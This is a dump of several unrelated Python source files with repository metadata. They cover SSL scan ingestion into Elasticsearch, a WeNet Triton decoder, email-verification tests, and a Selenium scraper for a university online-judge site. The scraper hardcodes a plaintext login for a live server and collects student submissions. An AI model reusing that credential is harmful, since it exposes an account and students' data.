w.writerow([tweet.created_at, tweet.full_text.replace('\n', ' ').encode('utf-8'),
tweet.user.screen_name.encode('utf-8'),
[e['text'] for e in tweet._json['entities']['hashtags']], tweet.user.followers_count, tweet.user.location])
print(i , [tweet.created_at, tweet.full_text.replace('\n', ' ').encode('utf-8'),
tweet.user.screen_name.encode('utf-8'),
[e['text'] for e in tweet._json['entities']['hashtags']], tweet.user.followers_count, tweet.user.location])
i = i+1
print("Done")
#string = word_tokenize(string)
# print(nltk.pos_tag(string))
if __name__ == '__main__':
consumer_key =
consumer_secret =
access_token =
access_token_secret =
hashtag_phrase = 'geocode:27.466079,89.639010,30km'
search_for_hashtags(consumer_key, consumer_secret,
access_token, access_token_secret, hashtag_phrase)
| 38.553571
| 131
| 0.637332
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 607
| 0.281149
|
b1a2e9e876bf7788f4968b9eb3b29a91a90c21c3
| 9,585
|
py
|
Python
|
umich_daily.py
|
mpars0ns/scansio-sonar-es
|
ea7b1928277317b97c84443812da01af99ef0feb
|
[
"BSD-3-Clause"
] | 36
|
2015-10-14T21:17:16.000Z
|
2022-01-21T16:34:24.000Z
|
umich_daily.py
|
mpars0ns/scansio-sonar-es
|
ea7b1928277317b97c84443812da01af99ef0feb
|
[
"BSD-3-Clause"
] | 5
|
2015-10-19T13:47:55.000Z
|
2017-06-21T07:12:41.000Z
|
umich_daily.py
|
mpars0ns/scansio-sonar-es
|
ea7b1928277317b97c84443812da01af99ef0feb
|
[
"BSD-3-Clause"
] | 8
|
2016-04-28T09:34:20.000Z
|
2022-01-21T16:34:23.000Z
|
import argparse
import sys
from multiprocessing import cpu_count, Process, Queue
import json
import logging
from datetime import datetime
from elasticsearch import Elasticsearch
from elasticsearch.helpers import bulk, scan
import hashlib
from helpers.certparser import process_cert
from helpers.hostparser import proccess_host
logger = logging.getLogger('SSLImporter')
logger_format = logging.Formatter('\033[1;32m%(levelname)-5s %(module)s:%(funcName)s():%(lineno)d %(asctime)s\033[0m| '
'%(message)s')
stream_handler = logging.StreamHandler(sys.stdout)
stream_handler.setFormatter(logger_format)
logger.addHandler(stream_handler)
elastic_logger = logging.getLogger('elasticsearch')
elastic_logger.addHandler(stream_handler)
DEFAULT_SERVER = u'localhost'
DEFAULT_PORT = 9200
def process_scan_certs(q, es):
"""
:param q: The Queue object that certs should be pulled off of
:param es: An Elasticsearch connection. This way each worker has its own connection and you don't have to share it
across multiple workers/processes
:return:
"""
bulk_certs = []
while True:
certs = q.get()
if certs == "DONE":
bulk(es, bulk_certs)
return True
for cert in certs['certs']:
newcert = process_cert(cert)
if newcert:
newcert['import_date'] = certs['time']
newcert['source'] = 'umich'
newcert_action = {"_index": "passive-ssl-certs-umich", "_type": "cert", '_id': newcert['hash_id'],
'_source': newcert}
bulk_certs.append(newcert_action)
if len(bulk_certs) == 500:
bulk(es, bulk_certs)
bulk_certs = []
def process_hosts(q, es, initial):
"""
:param q: The Queue object that hosts should be pulled off of
:param es: An Elasticsearch connection. This way each worker has its own connection and you don't have to share it
across multiple workers/processes
:param initial: If this is the initial upload then we set the first_seen = last_seen. Other wise first_seen is left
blank and will be cleaned up later
:return:
"""
bulk_hosts = []
while True:
line = q.get()
if line == "DONE":
bulk(es, bulk_hosts)
return True
host = proccess_host(line)
cert_hash = hashlib.sha1(host['host']+host['hash']+host['source'])
cert_hash = cert_hash.hexdigest()
if initial:
host['first_seen'] = host['last_seen']
action = {"_op_type": "update", "_index": 'passive-ssl-hosts-umich', "_type": "host", "_id": cert_hash,
"doc": line, "doc_as_upsert": "true"}
bulk_hosts.append(action)
if len(bulk_hosts) == 500:
bulk(es, bulk_hosts)
bulk_hosts = []
def parse_scanfile(f, host_queue, cert_queue):
"""
:param f: json file from University of Michigan that has been lz4 decompressed.
:param host_queue: Queue to send host info to
:param cert_queue: Queue to send cert info to
:return:
"""
certs_set = set()
with open(f) as scan_file:
for line in scan_file:
item = json.loads(line)
item['log'].pop(0)
for entry in item['log']:
if entry['data']:
if 'server_certificates' in entry['data'] and entry['data']['server_certificates'] is not None:
if entry['data']['server_certificates']['certificate'] is not None:
if 'fingerprint_sha1' in entry['data']['server_certificates']['certificate']:
server_cert = entry['data']['server_certificates']['certificate']['fingerprint_sha1']
doc = {'host': item['host'], 'source': 'umich', 'last_seen': item['time'],
'hash': server_cert}
host_queue.put(doc)
if server_cert in certs_set:
pass # We already have this sha1 and we don't need to attempt parsing it
else:
if entry['data']['server_certificates']['certificate'] is not None:
if 'raw' in entry['data']['server_certificates']:
raw_cert = dict()
raw_cert['time'] = item['time']
raw_cert['certs'] = entry['data']['server_certificates']['raw']
else:
raw_cert = None
if raw_cert:
cert_queue.put(raw_cert)
certs_set.add(server_cert) # We have added this hash to be processed so we
# don't need to process it again
print "Finished processing file....now printing the length of the certs set"
print len(certs_set)
def main(argv):
parser = argparse.ArgumentParser()
parser.add_argument('--server', default=DEFAULT_SERVER,
help=u'Elasticsearch hostname or IP (default {0})'.format(DEFAULT_SERVER))
parser.add_argument('--port', default=DEFAULT_PORT,
help=u'Elasticsearch port (default {0})'.format(DEFAULT_PORT))
parser.add_argument('--scanfile', help=u'Path to umich scan file you are ingesting. '
u'Please make sure to decompress it')
parser.add_argument('--initial', help=u'If this is the first file you are importing please use this flag',
action='store_true')
args = parser.parse_args(argv[1:])
if args.scanfile is None:
logger.error("Please include a scanfile")
sys.exit(1)
workers = cpu_count()
process_hosts_queue = Queue(maxsize=20000)
process_certs_queue = Queue(maxsize=20000)
for w in xrange(workers/2):
# Establish elasticsearch connection for each process
es = Elasticsearch([{u'host': args.server, u'port': args.port}], timeout=30)
p = Process(target=process_hosts, args=(process_hosts_queue, es, args.initial))
p.daemon = True
p.start()
for w in xrange(workers/2):
# Establish elasticsearch connection for each process
es = Elasticsearch([{u'host': args.server, u'port': args.port}], timeout=30)
p = Process(target=process_scan_certs, args=(process_certs_queue, es))
p.daemon = True
p.start()
logger.warning("Starting processing of {file} at {date}".format(file=args.scanfile, date=datetime.now()))
# This is the bottle neck of the process but it works for now
parse_scanfile(args.scanfile, process_hosts_queue, process_certs_queue)
# Once all the json lines have been put onto the queue. Add DONE so the queue workers know when to quit.
for w in xrange(workers):
process_hosts_queue.put("DONE")
process_certs_queue.put("DONE")
# Close out the queue we are done
process_hosts_queue.close()
process_hosts_queue.join_thread()
process_certs_queue.close()
process_certs_queue.join_thread()
# this is kinda dirty but without looking up everything at insert time (slow) I don't know of a better way to do
# this based on the number of documents we will have
refresh_es = Elasticsearch([{u'host': args.server, u'port': args.port}], timeout=30)
# construct an elasticsearch query where the filter is looking for any entry that is missing the field first_seen
q = {'size': 500, "query": {"match_all": {}}, "filter": {"missing": {"field": "first_seen"}}}
new_updates = refresh_es.search(index='passive-ssl-hosts-umich', body=q)
logger.warning("Numer of hosts to update is {count}".format(count=new_updates['hits']['total']))
# Scan across all the documents missing the first_seen field and bulk update them
missing_first_seen = scan(refresh_es, query=q, scroll='30m', index='passive-ssl-hosts-umich')
bulk_miss = []
for miss in missing_first_seen:
last_seen = miss['_source']['last_seen']
first_seen = last_seen
action = {"_op_type": "update", "_index": "passive-ssl-hosts-umich", "_type": "host", "_id": miss['_id'],
"doc": {'first_seen': first_seen}}
bulk_miss.append(action)
if len(bulk_miss) == 500:
bulk(refresh_es, bulk_miss)
bulk_miss = []
# Get the remaining ones that are less than 000 and the loop has ended
bulk(refresh_es, bulk_miss)
logger.warning("{file} import finished at {date}".format(file=args.scanfile, date=datetime.now()))
# Now we should optimize each index to max num segments of 1 to help with searching/sizing and just over all
# es happiness
logger.warning("Optimizing index: {index} at {date}".format(index='passive-ssl-hosts-umich', date=datetime.now()))
refresh_es.indices.optimize(index='passive-ssl-hosts-umich', max_num_segments=1, request_timeout=7500)
logger.warning("Optimizing index: {index} at {date}".format(index='passive-ssl-certs-umich', date=datetime.now()))
refresh_es.indices.optimize(index='passive-ssl-certs-umich', max_num_segments=1, request_timeout=7500)
if __name__ == "__main__":
main(sys.argv)
| 45.212264
| 119
| 0.605842
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 3,666
| 0.382473
|
b1a35e06a9245c638232ac973c3cdcca21d276f6
| 980
|
py
|
Python
|
project/tests/scripts/system_vars.py
|
LeDron12/c2eo
|
4f0dc6ed79df0739bd834eda6a0f77f3caf4292c
|
[
"MIT"
] | 12
|
2021-08-05T12:12:09.000Z
|
2022-03-08T13:33:53.000Z
|
project/tests/scripts/system_vars.py
|
LeDron12/c2eo
|
4f0dc6ed79df0739bd834eda6a0f77f3caf4292c
|
[
"MIT"
] | 26
|
2021-08-23T10:25:37.000Z
|
2022-03-30T12:56:08.000Z
|
project/tests/scripts/system_vars.py
|
LeDron12/c2eo
|
4f0dc6ed79df0739bd834eda6a0f77f3caf4292c
|
[
"MIT"
] | 12
|
2021-08-17T09:20:07.000Z
|
2022-03-31T13:37:28.000Z
|
integer = [
['lld', 'long long', 9223372036854775807, -9223372036854775808],
['ld', 'long', 9223372036854775807, -9223372036854775808],
['lu', 'unsigned long', 18446744073709551615, 0],
['d', 'signed', 2147483647, -2147483648],
['u', 'unsigned', 4294967295, 0],
['hd', 'short', 32767, -32768],
['hu', 'unsigned short', 65535, 0],
['c', 'char', 127, -128],
['c', 'unsigned char', 255, 0],
['d', '_Bool', 1, 0],
]
real = [
['f', 'float', 3.40282e+38, -3.40282e+38],
['f', 'double', 1.79769e+308, -1.79769e+308],
['Lf', 'long double', 1.79769e+308, -1.79769e+308]
]
# todo: fix path
path = ''
directory = 'env'
filename1 = f'{directory}/code1.c'
filename2 = f'{directory}/code2.c'
logfile1 = f'{directory}/log1.txt'
logfile2 = f'{directory}/log2.txt'
eo_out = f'{directory}/eo_out.txt'
c_out = f'{directory}/c_out.txt'
c_bin = f'{directory}/a.out'
launcher = '../../bin/launcher.py'
full_log = None
resultDir = '../../../result'
| 29.69697
| 68
| 0.596939
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 397
| 0.405102
|
b1a435a669f2409d097f7f74a5d9ca3c12d7e85f
| 1,944
|
py
|
Python
|
isaactest/tests/recieve_verify_emails.py
|
jsharkey13/isaac-selenium-testing
|
fc57ec57179cf7d9f0bb5ef46d759792b2af3bc8
|
[
"MIT"
] | null | null | null |
isaactest/tests/recieve_verify_emails.py
|
jsharkey13/isaac-selenium-testing
|
fc57ec57179cf7d9f0bb5ef46d759792b2af3bc8
|
[
"MIT"
] | 1
|
2016-01-15T11:28:06.000Z
|
2016-01-25T17:09:18.000Z
|
isaactest/tests/recieve_verify_emails.py
|
jsharkey13/isaac-selenium-testing
|
fc57ec57179cf7d9f0bb5ef46d759792b2af3bc8
|
[
"MIT"
] | 1
|
2019-05-14T16:53:49.000Z
|
2019-05-14T16:53:49.000Z
|
from ..utils.log import log, INFO, ERROR, PASS
from ..utils.i_selenium import assert_tab, image_div
from ..tests import TestWithDependency
__all__ = ["recieve_verify_emails"]
#####
# Test : Recieve Verification Emails
#####
@TestWithDependency("RECIEVE_VERIFY_EMAILS", ["REQ_VERIFY_EMAILS"])
def recieve_verify_emails(driver, inbox, GUERRILLAMAIL, WAIT_DUR, **kwargs):
"""Test if the new verification emails are recieved.
- 'driver' should be a Selenium WebDriver.
- 'inbox' should be a GuerrillaInbox object.
- 'GUERRILLAMAIL' is the string URL of GuerrillaMail.
"""
verification_email_request_limit = 4
assert_tab(driver, GUERRILLAMAIL)
inbox.wait_for_email(WAIT_DUR, expected=verification_email_request_limit)
try:
verification_emails_recived = 0
log(INFO, "Checking if verification emails recieved.")
verification_emails = inbox.get_by_subject("Verify your email")
verification_emails_recived = len(verification_emails)
assert verification_emails_recived > 0
if verification_emails_recived != verification_email_request_limit:
log(ERROR, "Expected %s verification emails, received %s!" % (verification_email_request_limit, verification_emails_recived))
log(ERROR, "Will have to use last received verification email, not the last requested!")
else:
log(INFO, "Received all %s verification emails." % verification_email_request_limit)
for email in verification_emails:
email.image()
email.save_html_body()
log(PASS, "%s verification emails recieved." % verification_emails_recived)
return True
except AssertionError:
image_div(driver, "ERROR_recieve_verification")
log(ERROR, "Expected %s verification emails, no emails received! See 'ERROR_recieve_verification.png'!" % (verification_email_request_limit))
return False
| 44.181818
| 149
| 0.718107
| 0
| 0
| 0
| 0
| 1,716
| 0.882716
| 0
| 0
| 715
| 0.367798
|
b1a4e4ea2b00add4c4b415ad7ce218f992351283
| 536
|
py
|
Python
|
setup.py
|
msabramo/grr
|
4b13392528d61a3d42e6c3baa14fa74cc920c055
|
[
"CC0-1.0"
] | null | null | null |
setup.py
|
msabramo/grr
|
4b13392528d61a3d42e6c3baa14fa74cc920c055
|
[
"CC0-1.0"
] | null | null | null |
setup.py
|
msabramo/grr
|
4b13392528d61a3d42e6c3baa14fa74cc920c055
|
[
"CC0-1.0"
] | null | null | null |
#!/usr/bin/env python3
from setuptools import setup
import sys
setup(
name='grr',
version='0.2',
author='Kunal Mehta',
author_email='legoktm@gmail.com',
url='https://github.com/legoktm/grr/',
license='CC-0',
description='A command-line utility to work with Gerrit',
long_description=open('README.rst').read(),
packages=['grr'],
install_requires=['configparser'] if sys.version_info[0] == 2 else [],
entry_points={
'console_scripts': [
'grr = grr:main'
],
}
)
| 24.363636
| 74
| 0.613806
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 211
| 0.393657
|
b1a5144b5a072c013aabc225925d03cb09f975fc
| 11,553
|
py
|
Python
|
runtime/server/x86_gpu/model_repo_stateful/wenet/1/wenet_onnx_model.py
|
zelda3721/wenet
|
f41555469b93bcc055a95432dd14fd1400522964
|
[
"Apache-2.0"
] | null | null | null |
runtime/server/x86_gpu/model_repo_stateful/wenet/1/wenet_onnx_model.py
|
zelda3721/wenet
|
f41555469b93bcc055a95432dd14fd1400522964
|
[
"Apache-2.0"
] | null | null | null |
runtime/server/x86_gpu/model_repo_stateful/wenet/1/wenet_onnx_model.py
|
zelda3721/wenet
|
f41555469b93bcc055a95432dd14fd1400522964
|
[
"Apache-2.0"
] | 1
|
2022-02-08T07:39:13.000Z
|
2022-02-08T07:39:13.000Z
|
# Copyright (c) 2021, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import multiprocessing
import numpy as np
import os
import torch
import triton_python_backend_utils as pb_utils
from torch.utils.dlpack import to_dlpack, from_dlpack
from swig_decoders import ctc_beam_search_decoder_batch, Scorer, map_batch
class WenetModel(object):
def __init__(self, model_config, device):
params = self.parse_model_parameters(model_config)
self.device = device
print("Using device", device)
print("Successfully load model !")
# load vocabulary
ret = self.load_vocab(params["vocab_path"])
self.id2vocab, self.vocab, space_id, blank_id, sos_eos = ret
self.space_id = space_id if space_id else -1
self.blank_id = blank_id if blank_id else 0
self.eos = self.sos = sos_eos if sos_eos else len(self.vocab) - 1
print("Successfully load vocabulary !")
self.params = params
# beam search setting
self.beam_size = params.get("beam_size")
self.cutoff_prob = params.get("cutoff_prob")
# language model
lm_path = params.get("lm_path", None)
alpha, beta = params.get('alpha'), params.get('beta')
self.scorer = None
if os.path.exists(lm_path):
self.scorer = Scorer(alpha, beta, lm_path, self.vocab)
self.bidecoder = params.get('bidecoder')
# rescore setting
self.rescoring = params.get("rescoring", 0)
print("Using rescoring:", bool(self.rescoring))
print("Successfully load all parameters!")
self.dtype = torch.float16
def generate_init_cache(self):
encoder_out = None
return encoder_out
def load_vocab(self, vocab_file):
"""
load lang_char.txt
"""
id2vocab = {}
space_id, blank_id, sos_eos = None, None, None
with open(vocab_file, "r", encoding="utf-8") as f:
for line in f:
line = line.strip()
char, id = line.split()
id2vocab[int(id)] = char
if char == " ":
space_id = int(id)
elif char == "<blank>":
blank_id = int(id)
elif char == "<sos/eos>":
sos_eos = int(id)
vocab = [0] * len(id2vocab)
for id, char in id2vocab.items():
vocab[id] = char
return (id2vocab, vocab, space_id, blank_id, sos_eos)
def parse_model_parameters(self, model_parameters):
model_p = {"beam_size": 10,
"cutoff_prob": 0.999,
"vocab_path": None,
"lm_path": None,
"alpha": 2.0,
"beta": 1.0,
"rescoring": 0,
"bidecoder": 1}
# get parameter configurations
for li in model_parameters.items():
key, value = li
true_value = value["string_value"]
if key not in model_p:
continue
key_type = type(model_p[key])
if key_type == type(None):
model_p[key] = true_value
else:
model_p[key] = key_type(true_value)
assert model_p["vocab_path"] is not None
return model_p
def infer(self, batch_log_probs, batch_log_probs_idx,
seq_lens, rescore_index, batch_states):
"""
batch_states = [trieVector, batch_start,
batch_encoder_hist, cur_encoder_out]
"""
trie_vector, batch_start, batch_encoder_hist, cur_encoder_out = batch_states
num_processes = min(multiprocessing.cpu_count(), len(batch_log_probs))
score_hyps = self.batch_ctc_prefix_beam_search_cpu(batch_log_probs,
batch_log_probs_idx,
seq_lens,
trie_vector,
batch_start,
self.beam_size,
self.blank_id,
self.space_id,
self.cutoff_prob,
num_processes,
self.scorer)
if self.rescoring and len(rescore_index) != 0:
# find the end of sequence
rescore_encoder_hist = []
rescore_encoder_lens = []
rescore_hyps = []
res_idx = list(rescore_index.keys())
max_length = -1
for idx in res_idx:
hist_enc = batch_encoder_hist[idx]
if hist_enc is None:
cur_enc = cur_encoder_out[idx]
else:
cur_enc = torch.cat([hist_enc, cur_encoder_out[idx]], axis=0)
rescore_encoder_hist.append(cur_enc)
cur_mask_len = int(len(hist_enc) + seq_lens[idx])
rescore_encoder_lens.append(cur_mask_len)
rescore_hyps.append(score_hyps[idx])
if cur_enc.shape[0] > max_length:
max_length = cur_enc.shape[0]
best_index = self.batch_rescoring(rescore_hyps, rescore_encoder_hist,
rescore_encoder_lens, max_length)
best_sent = []
j = 0
for idx, li in enumerate(score_hyps):
if idx in rescore_index and self.rescoring:
best_sent.append(li[best_index[j]][1])
j += 1
else:
best_sent.append(li[0][1])
final_result = map_batch(best_sent, self.vocab, num_processes)
return final_result, cur_encoder_out
def batch_ctc_prefix_beam_search_cpu(self, batch_log_probs_seq,
batch_log_probs_idx,
batch_len, batch_root,
batch_start, beam_size,
blank_id, space_id,
cutoff_prob, num_processes,
scorer):
"""
Return: Batch x Beam_size elements, each element is a tuple
(score, list of ids),
"""
batch_len_list = batch_len
batch_log_probs_seq_list = []
batch_log_probs_idx_list = []
for i in range(len(batch_len_list)):
cur_len = int(batch_len_list[i])
batch_log_probs_seq_list.append(batch_log_probs_seq[i][0:cur_len].tolist())
batch_log_probs_idx_list.append(batch_log_probs_idx[i][0:cur_len].tolist())
score_hyps = ctc_beam_search_decoder_batch(batch_log_probs_seq_list,
batch_log_probs_idx_list,
batch_root,
batch_start,
beam_size,
num_processes,
blank_id,
space_id,
cutoff_prob,
scorer)
return score_hyps
def batch_rescoring(self, score_hyps, hist_enc, hist_mask_len, max_len):
"""
score_hyps: [((ctc_score, (id1, id2, id3, ....)), (), ...), ....]
hist_enc: [len1xF, len2xF, .....]
hist_mask: [1x1xlen1, 1x1xlen2]
return bzx1 best_index
"""
bz = len(hist_enc)
f = hist_enc[0].shape[-1]
beam_size = self.beam_size
encoder_lens = np.zeros((bz, 1), dtype=np.int32)
encoder_out = torch.zeros((bz, max_len, f), dtype=self.dtype)
hyps = []
ctc_score = torch.zeros((bz, beam_size), dtype=self.dtype)
max_seq_len = 0
for i in range(bz):
cur_len = hist_enc[i].shape[0]
encoder_out[i, 0:cur_len] = hist_enc[i]
encoder_lens[i, 0] = hist_mask_len[i]
# process candidate
if len(score_hyps[i]) < beam_size:
to_append = (beam_size - len(score_hyps[i])) * [(-10000, ())]
score_hyps[i] = list(score_hyps[i]) + to_append
for idx, c in enumerate(score_hyps[i]):
score, idlist = c
if score < -10000:
score = -10000
ctc_score[i][idx] = score
hyps.append(list(idlist))
if len(hyps[-1]) > max_seq_len:
max_seq_len = len(hyps[-1])
max_seq_len += 2
hyps_pad_sos_eos = np.ones((bz, beam_size, max_seq_len), dtype=np.int64)
hyps_pad_sos_eos = hyps_pad_sos_eos * self.eos # fill eos
if self.bidecoder:
r_hyps_pad_sos_eos = np.ones((bz, beam_size, max_seq_len), dtype=np.int64)
r_hyps_pad_sos_eos = r_hyps_pad_sos_eos * self.eos
hyps_lens_sos = np.ones((bz, beam_size), dtype=np.int32)
bz_id = 0
for idx, cand in enumerate(hyps):
bz_id = idx // beam_size
length = len(cand) + 2
bz_offset = idx % beam_size
pad_cand = [self.sos] + cand + [self.eos]
hyps_pad_sos_eos[bz_id][bz_offset][0 : length] = pad_cand
if self.bidecoder:
r_pad_cand = [self.sos] + cand[::-1] + [self.eos]
r_hyps_pad_sos_eos[bz_id][bz_offset][0:length] = r_pad_cand
hyps_lens_sos[bz_id][idx % beam_size] = len(cand) + 1
in0 = pb_utils.Tensor.from_dlpack("encoder_out", to_dlpack(encoder_out))
in1 = pb_utils.Tensor("encoder_out_lens", encoder_lens)
in2 = pb_utils.Tensor("hyps_pad_sos_eos", hyps_pad_sos_eos)
in3 = pb_utils.Tensor("hyps_lens_sos", hyps_lens_sos)
input_tensors = [in0, in1, in2, in3]
if self.bidecoder:
in4 = pb_utils.Tensor("r_hyps_pad_sos_eos", r_hyps_pad_sos_eos)
input_tensors.append(in4)
in5 = pb_utils.Tensor.from_dlpack("ctc_score", to_dlpack(ctc_score))
input_tensors.append(in5)
request = pb_utils.InferenceRequest(model_name='decoder',
requested_output_names=['best_index'],
inputs=input_tensors)
response = request.exec()
best_index = pb_utils.get_output_tensor_by_name(response, 'best_index')
best_index = from_dlpack(best_index.to_dlpack()).clone()
best_index = best_index.numpy()[:, 0]
return best_index
def __del__(self):
print("remove wenet model")
| 42.947955
| 87
| 0.528348
| 10,698
| 0.925993
| 0
| 0
| 0
| 0
| 0
| 0
| 1,736
| 0.150264
|
b1a58559665e94514cdf1de5372c35158b389ecc
| 7,254
|
py
|
Python
|
stuojchaques.py
|
sunlupeng2020/stuoj
|
f8c109894e7a7118dc632fef34c55a01fe116f9a
|
[
"Apache-2.0"
] | null | null | null |
stuojchaques.py
|
sunlupeng2020/stuoj
|
f8c109894e7a7118dc632fef34c55a01fe116f9a
|
[
"Apache-2.0"
] | null | null | null |
stuojchaques.py
|
sunlupeng2020/stuoj
|
f8c109894e7a7118dc632fef34c55a01fe116f9a
|
[
"Apache-2.0"
] | null | null | null |
# 获取学生所有的挑战题目信息
# 包括时间、结果、代码等
# 写入数据库stuoj的stuquestionbh表中
from selenium import webdriver
# from selenium.webdriver.common.by import By
import pymysql
import re
from bs4 import BeautifulSoup
import connsql
# import loginzznuoj
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
import ojtmxx
import time
# driver_path = "D:\\ChromeCoreDownloads\\chromedriver_win32\\chromedriver.exe"
# driver = webdriver.Chrome()
driver = webdriver.PhantomJS()
cur = connsql.conn.cursor()
# 得到OJ平台上某学生提交某题目的信息列表
def getOjQuesNo(stuno,quesno):# 学号,题目号
stuquesUrl = "http://47.95.10.46/status.php?pid="+str(quesno)+"&uid="+str(stuno)+"&language=-1&judgeresult=-1"
driver.get(stuquesUrl)
# pidtxtbox = driver.find_element_by_name("pid") # 输入题目id的textbox的id
# uidtxtbox = driver.find_element_by_name("uid") # 输入用户ID的textbox的id
# pidtxtbox.send_keys(quesno) # 填入题目ID
# uidtxtbox.send_keys(stuno) # 填入用户ID
# driver.find_elements_by_xpath("//button[@class='btn btn-default']")[0].click()
# button.click()
questrs = driver.find_elements_by_xpath("//tbody/tr")
sql = "insert into stuchallenged(challengeid,stuno,questionid,result,memory,timecost," \
"language,codelength,challtime) values(%s,%s,%s,%s,%s,%s,%s,%s,%s)"
if len(questrs)>0:
for trbj in questrs:
trbjsplit = str(trbj.text).split(' ', 8)
# trbjsplit[1] = str(stuno)
# print(trbjsplit)
# trbjsplit[1] = '204215091027'
cur.execute(sql, trbjsplit)
# print(soup.text)
# print(button.text)
def loginzznuoj(): # 登陆
loginurl = 'http://47.95.10.46/loginpage.php'
driver.get(loginurl)
driver.find_element_by_name("username").send_keys('slp')
driver.find_element_by_name("password").send_keys('slp123456')
submitbutton = driver.find_element_by_tag_name("button")
# print(submitbutton.text)
submitbutton.click()
# try:
# WebDriverWait(driver, 10).until(EC.title_is("ZZNUOJ"))
# finally:
# pass
def getsubmitcode(quesno,submitno):# 由提交号,题目号得到提交的代码
url = "http://47.95.10.46/problemsubmit.php?sid="+str(submitno)+"&pid="+str(quesno) # 访问提交页面
driver.get(url)
# 将显示代码的textarea的displays属性由none改为block,以获取其中的代码
js = "document.getElementById('source').style.display='block';"
driver.execute_script(js)
codes = driver.find_element_by_name("source").text
return codes
# 调用js脚本print(codeee)
def getstuquestions(stuno):#按学号搜索学生通过题目数、挑战题目数
# 访问郑州师范学院OJ平台的“排名”页面
driver.get("http://47.95.10.46/ranklist.php")
# 找到页面上的输入用户名的文本框
driver.find_element_by_name("keyword").send_keys(stuno) # 输入学生学号
button = driver.find_elements_by_xpath("//button[@class='btn btn-default']")[1] # .click() # 单击搜索按钮
# container.row.input-group.input-group-btn.btn.btn-default
button.click()
# 找到学生名字、通过题目数、提交数等的超链接
link1 = driver.find_elements_by_xpath("//div[@class='col-md-12']/table/tbody/tr/td/a")
i = 0
link = link1[0]
link.click()
# 找到题号的超链接
timuhaos = driver.find_elements_by_xpath("//div[@class='well collapse in']/a")
# print(timuhaos)
for tihaolink in timuhaos:
# print(tihaolink.text) #输出题号
# 将学生做的题号插入到数据库
sql="insert into stuques(stuno,questionbh)values(%s,%s)"
cur.execute(sql, (stuno, tihaolink.text))
# print(stuno, tihaolink.text)
def getStuChallengenum(stuno):# 按学号获取学生挑战次数
url = "http://47.95.10.46/ranklist.php?keyword="+str(stuno)
driver.get(url)
challed = driver.find_elements_by_xpath("//tbody//a")
cnum=challed[3].text # 挑战数量
return cnum
# print(cnum)
def getstudentno(banjiid): # 根据班级ID得到学生学号列表
sql = "select stuno from student where banjiid =" + str(banjiid)
cur.execute(sql)
results = cur.fetchall() # 用于返回多条数据,得到全部学生学号
# cur.close()
return results
def getstudentxuehao():
banjiids = tuple(range(1, 2))# 各个班级的Id元组
for banjiid in banjiids:
print(banjiid)
sql = "select stuno from student where banjiid =" + str(banjiid)
cur.execute(sql)
results = cur.fetchall() # 用于返回多条数据,得到全部学生学号
for stuno in results: # print(result[0])
# 得到学生完成的题目数
getstuquestions(stuno)
# getstudentxuehao()# 得到所有学生做的题号
# getOjQuesNo('204215091001', '1003')
# cur.close()
def getBanjiChallengeNum(banjino):# 得到一个班的学生的挑战数量,写入数据库
stuojusernamelist = getbanjistuojusername(banjino) # 得到该班学生用户名
sqlupdate = "update student set challenge=%s where ojusername=%s"
# cur = connsql.conn.cursor()
for stuojusername in stuojusernamelist:
# print(stuojusername[0])
# print(getStuChallengenum(stuojusername[0]))
cur.execute(sqlupdate,(getStuChallengenum(stuojusername[0]),stuojusername[0]))# 更新学生挑战的次数
def getbanjistuojusername(banjino): # 根据班级id得到该班学生的用户名列表
sql = "select ojusername from student where banjiid=%s"
cur.execute(sql, (banjino,))
return cur.fetchall()
# 得到学生的挑战信息,根据学生学号
def getstuchallenge():
sql = "select `questionid`,`challengeid` from `stuchallenged` where `code` is null"
cur.execute(sql)
results = cur.fetchall()
return results
def updatequescode(quesno, submitno, code): # 更新数据库中的代码
sql = "update `stuchallenged` set `code`=%s where `questionid`=%s and `challengeid`=%s"
cur.execute(sql,(code, quesno, submitno))
if __name__ == '__main__':
# cur = connsql.conn.cursor() # 引用 connsql 中的conn变量
# getBanjiChallengeNum(1)
# getStuChallengenum('204215091001')
# getOjQuesNo('204215091001', '1003')
# print(getbanjistuojusername(1))
# cur.close()
loginzznuoj() # 登陆校OJ平台
time.sleep(2)
# codes = getsubmitcode(1000,1063215)
# print(codes)
# options.addArguments(
# "--user-data-dir=" + System.getenv("USERPROFILE") + "/AppData/Local/Google/Chrome/User Data/Default");
# driver.get("http://47.95.10.46/problemsubmit.php?sid=1063215&pid=1000")
results = getstuchallenge()
for result in results:
print(result)
# url = "http://47.95.10.46/problemsubmit.php?sid=" + str(result[1]) + "&pid=" + str(result[0]) # 访问提交页面
# # driver.get(url)
codes = getsubmitcode(result[0], result[1])
if len(codes) > 5000:
codes = codes[0:5000]
# print(codes)
updatequescode(result[0], result[1], str(codes).strip()) # 更新学生提交的代码
# getsubmitcode('1003', '1068443')
# 接下来,把每个学生提交的每道题都抓下来2021.1.17
# stuxhlist = getbanjistuojusername(1) # 1班的学生学号列表
# questionnolist= ojtmxx.getojallquesnofromdatabase() # 从数据库中得到题目ID
# print(questionnolist)
# for stuno in stuxhlist:
# stuno1 = stuno[0] # 学生用户名
# for i in range(33, 35):
# stuno1='2042150910'+str(i)
# # if int(stuno1) > 204215091003:
# for questionno in questionnolist:
# questionno0 = questionno[0]
# print((stuno1, questionno0))
# getOjQuesNo(stuno1, questionno0)
# stuno1 = '204215091032'
# for questionno0 in range(1000, 2200):
# print((stuno1, questionno0))
# getOjQuesNo(stuno1, questionno0)
cur.close()
driver.close()
| 35.043478
| 114
| 0.666391
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 4,856
| 0.593643
|
b1a5a19351b24a513cab2db62b55e27e8f29e1d1
| 3,899
|
py
|
Python
|
tests/test_core.py
|
TheCheapestPixels/panda3d-stageflow
|
7a049d939dec39e3ac780872bbaba5c25f309397
|
[
"BSD-3-Clause"
] | 3
|
2020-10-04T18:52:37.000Z
|
2022-02-21T13:21:45.000Z
|
tests/test_core.py
|
